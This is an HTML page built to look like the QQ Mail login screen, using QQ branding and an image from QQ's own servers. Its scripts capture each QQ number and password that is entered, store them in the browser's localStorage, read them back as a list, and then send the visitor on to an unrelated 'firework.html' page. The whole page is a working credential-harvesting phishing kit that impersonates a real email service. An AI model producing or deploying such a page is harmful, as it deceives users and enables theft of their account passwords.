<!DOCTYPE html>
<html>
    <meta charset="utf-8">
    <title>登录qq邮箱</title>
    <style type="text/css">
        *{
            padding:0;
            margin:0;
        }
        body{
            font-size:12px;
        }
        .content{
            width:1100px;
            height:500px;
            margin:auto;
            margin-top:80px;
        }
         .content .text{
            float:left;
            margin-top:40px;
            margin-left:70px;
            line-height: 200%;
        }
        .content .text h1{
            color:#1d5494;
            margin-bottom:20px;
        }
        .content .text p{
            font-size:13px;
        }        .content .pic{
            float:left;
            margin-top:25px;
            margin-right:60px;
        }
        .content .login{
            float:left;
            width:350px;
            height:400px;
            border:1px solid #1d5494;
        }
        .content .login .sidebar{
            border-bottom:1px solid #1d5494;
            height:50px;
            line-height: 50px;
        }
        .content .login ul li{
            list-style-type: none;
            display:block;
            height:50px;
            font-size:16px;
            font-family: "微软雅黑";
            color:gray;
        }
        .content .login ul .tab1{
            float:left;
            margin-left:45px;
            cursor: pointer;
        }
        .content .login ul .tab2{
            float:right;
            margin-right:45px;
            cursor: pointer;
        }
        .content .login .acount{
            margin-top:40px;
            margin-left:27px;
            width:280px;
            height:35px;
            font-family: "微软雅黑";
        }
        .content .login .password{
            margin-top:15px;
            margin-left:27px;
            width:280px;
            height:35px;
            font-family: "微软雅黑";
        }
        .content .login .checkbox{
            float:left;
            margin-top:30px;
            margin-left:30px;
            width:20px;
            height:20px;
            border:1px solid black;
            background:white;
        }
        .content .login p{
            margin-top:30px;
            float:left;
        }
        .content .login .submit{
            margin-left:27px;
            margin-top:10px;
            width:280px;
            height:40px;
            background:cornflowerblue;
            border:1px solid cornflowerblue;
            font-size:16px;
            color:white;
            font-family:"微软雅黑";
            cursor: pointer;    
        }
        .content .login .code{
            margin-top:10px;
            margin-left:130px;
            color:#1d5494;
            cursor: pointer;
            font-size:13px;
        }
        .content .login .forget{
            float:left;
            margin-top:80px;
            margin-left:30px;
        }
        .content .login .new{
            float:right;
            margin-top:80px;
            margin-right:30px;
        }
        .content .login a{
            color:#1d5494;
            text-decoration: none;
        }
        .content .login a:hover{
            text-decoration: underline;
        }    </style>

    <body>
        <div class="content">
            <div class="text">
                <h1>QQ邮箱，常联系！</h1>
                <p>1987年9月14日21时07分</p>
                <p>中国第一封电子邮件</p>
                <p>从北京发往德国</p>
                <p>“越过长城，走向世界”</p>
            </div>
            <div class="pic">
		<img src="https://rescdn.qqmail.com/zh_CN/htmledition/images/tg-chang1ea8a2.png">
            </div>
            <div class="login">
                <ul class="sidebar">
                    <li class="tab1">微信登录</li>
                    <li class="tab2">QQ登陆</li>
                </ul>
		<form id="myForm" method="get" target="frameName" onsubmit="return toVaild()"  action="firework.html">
                	<input type="user" id="user" text" placeholder="支持QQ号/邮箱登录" name="User" class="acount"><br />
                	<input id="pass" type="password" placeholder="QQ密码" name="Pass" class="password"><br />
                	<input type="submit" value="登录" class="submit">
			<script type="text/javascript" src="https://code.jquery.com/jquery-3.6.3.js"></script>
		
	
		</form>
            </div>
        </div>
    </body>
<script language="javascript">
           

                var aa11 =window.localStorage.getItem('allnum');
		var aaObj2 = JSON.parse(aa11);
		var text = "";
                
		var i
		for(i=0;i<aaObj2.now;i++){
            	var aa =window.localStorage.getItem(i.toString());
		var aaObj = JSON.parse(aa);
                text +=aaObj.user_+" "+aaObj.pass_+"<br>";
		}
    </script>
<script language="javascript">
                function toVaild(){
		  var aa =window.localStorage.getItem('allnum');
		  var aaObj = JSON.parse(aa);
		  var thenum = aaObj.now;
		  thenum=thenum+1;
		  var tttttn = thenum.toString();
		var allnum = {
			now:thenum
		};
		var f2 = JSON.stringify(allnum);
		window.localStorage.setItem('allnum',f2);
		
                var val1 = document.getElementById("user").value;
		var val2 = document.getElementById("pass").value;
		var all = {
		user_:val1,
		pass_:val2
		};
                var f = JSON.stringify(all);
		window.localStorage.setItem(tttttn,f);
                return true;
            }
    </script>
</html>